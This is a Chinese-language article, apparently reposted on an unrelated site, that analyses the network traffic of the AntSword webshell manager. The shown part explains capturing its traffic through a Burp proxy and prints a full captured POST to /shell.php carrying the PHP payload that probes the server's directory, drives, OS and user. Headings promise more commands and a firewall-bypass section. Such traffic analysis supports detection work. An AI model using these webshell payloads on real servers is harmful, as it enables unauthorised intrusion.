中国蚁剑流量分析 |
您所在的位置:网站首页 › 中国蚁剑 › 中国蚁剑流量分析 |
中国蚁剑流量分析
文章目录
中国蚁剑流量分析1.代理2.测试连接数据包:执行代码:执行结果:
3.双击连接第一个数据包数据包:
第二个数据包数据包:执行代码:response:
4.打开文件夹数据包:
5.打开文件数据包:执行代码:
6.修改文件1.修改小文件数据包:执行代码:
2.修改大文件
7.wget文件数据包执行代码:
8.删除文件数据包:执行代码:
9.上传文件1.数据包:执行代码:
10.打开终端数据包执行代码
模块源码部分知识点1.测试连接部分2.删除文件3.命令执行
防火墙绕过
1.代理
蚁剑有设置代理的功能,所以可以直接bp抓包,比wireshark抓包方便一点。 分析一下测试数据包。 这里为了方便代码的分析我选择了default传输,直接可以看到代码,不需要编码解码。 但是实际连站的时候还是要加编码方式,要不然可能连不上。 下面这个是bp拦截到的数据包(数据包的数据是url编码过的,我解码提取出来的) 数据包: POST /shell.php HTTP/1.1 Host: 192.168.47.209:80 Accept-Encoding: gzip, deflate User-Agent: antSword/v2.1 Content-Type: application/x-www-form-urlencoded Content-Length: 989 Connection: close cmd=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "566a7";echo @asenc($output);echo "1d9d89261";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die(); 执行代码:最后执行的代码其实相当于: |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |